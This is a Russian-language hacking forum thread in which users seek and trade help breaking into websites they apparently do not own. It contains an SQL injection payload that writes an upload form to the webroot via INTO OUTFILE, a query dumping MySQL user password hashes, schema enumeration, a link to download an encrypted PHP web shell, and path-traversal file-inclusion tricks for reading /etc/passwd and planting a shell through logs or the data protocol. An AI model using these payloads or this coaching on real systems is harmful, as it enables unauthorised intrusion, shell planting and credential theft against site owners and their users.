Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'<html>
    <head>
    <title>
    a
    </title>
    </head>
    <body>
    <form action="upload.php" method="post" enctype="multipart/form-data">
    <label for="file">Файл:</label><br/>
    <input type="file" name="file" id="file" class="input"/><br>
    <input type="submit" type=submit value="Отправить">
    </form>
    </body>
    </html>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found:
    HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ' at line 3 (# 256).
    The following will be reported to the Administrator:
    Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается
     
  2. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
  3. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    А как их обойти можно?
     
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    Только HTML формы, только хардкод!!11

    1. Да, там magic_quotes.
    Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах.
    Вот сам способ:
    http://forum.antichat.ru/showpost.php?p=663815&postcount=39

    2. Ты уверен, что у твоего пользователя есть file_priv? =\

    3. HTML - это крута!!1
     
  5. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    Уверен что у него Y я файлы могу читать
     
  6. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    Даже те методы обхода не помогают или я не понл как им пользоваться
     
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Значит не повезло.
    Делай
    Code:
    select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user
    Дальше ищи phpmyadmin.
     
  8. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    А как его найти?
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ищеш дерикторю
    http://forum.antichat.ru/showpost.php?p=3107725&postcount=2
     
  10. x1ds

    x1ds New Member

    Joined:
    18 Apr 2011
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Возник вопрос:
    Как вывести все базы данных database() ?
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    schema_name from information_schema.schemata
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а можно подобнее? где что смотреть что гуглить?
     
  13. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?
     
  14. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Подскажите, кто-нибудь пользовался данной багой?
    Если наглядный пример использования?

    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180

    Nginx buffer underflow vulnerability

    Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
    Affected items
    Web Server
    The impact of this vulnerability
    Remote attackers may execute arbitrary code via crafted HTTP requests.
     
  15. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,184
    Likes Received:
    618
    Reputations:
    690
    ставишь шелл http://profexer.name/pas/download.php

    - Файловый менеджер :
    групповое удаление, перемещение, копирование, скачка и загрузка файлов и директорий.
    переименование и создание файлов и директорий.
    правка, просмотр, изменении атрибутов файлов.
    поиск файлов и директорий, текста в файлах.
    Нормально все работает, просто вводи желаемый логин и пароль - скачаешь зашифрованный шелл. Только не забудь потом эти самый логин/пароль - подсмотреть их не будет где
     
    _________________________
    #20195 shell_c0de, 20 Apr 2012
    Last edited: 20 Apr 2012
  16. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1

    есть еще шеллы на подобие этого?
    именно этот не хочет работать
     
  17. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    delete
     
    #20197 asiaman, 20 Apr 2012
    Last edited: 20 Apr 2012
  18. swad

    swad New Member

    Joined:
    14 Nov 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Есть сайт с php include
    Вид: index.php?sub_cat=
    В начале добавляется sub/ , в конце .php
    Попробовал получить /etc/passwd с нулевым байтом в конце, сработало.
    Конструкция вида ../../../../../../../../../../etc/passwd%00 отлично работает, sub/ в начале не добавляется.
    Возникает вопрос, а как залить шелл? Как отбросить в начале sub/ ?
    Через /proc/self/environ не получается, данные не пишутся
     
  19. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    sub ты откидываешь когда выходишь из деректории, т.е. типа ../../..
    Насчет шела, иши все что можно проинклудить, логи, письма, картинку может может залить можешь там, фичу с протоколом data тоже попробуй. Тут где то были пару статей которые нормально тему сисек раскрывают.
     
  20. swad

    swad New Member

    Joined:
    14 Nov 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ок спасибо, буду пробовать
     
Thread Status:
Not open for further replies.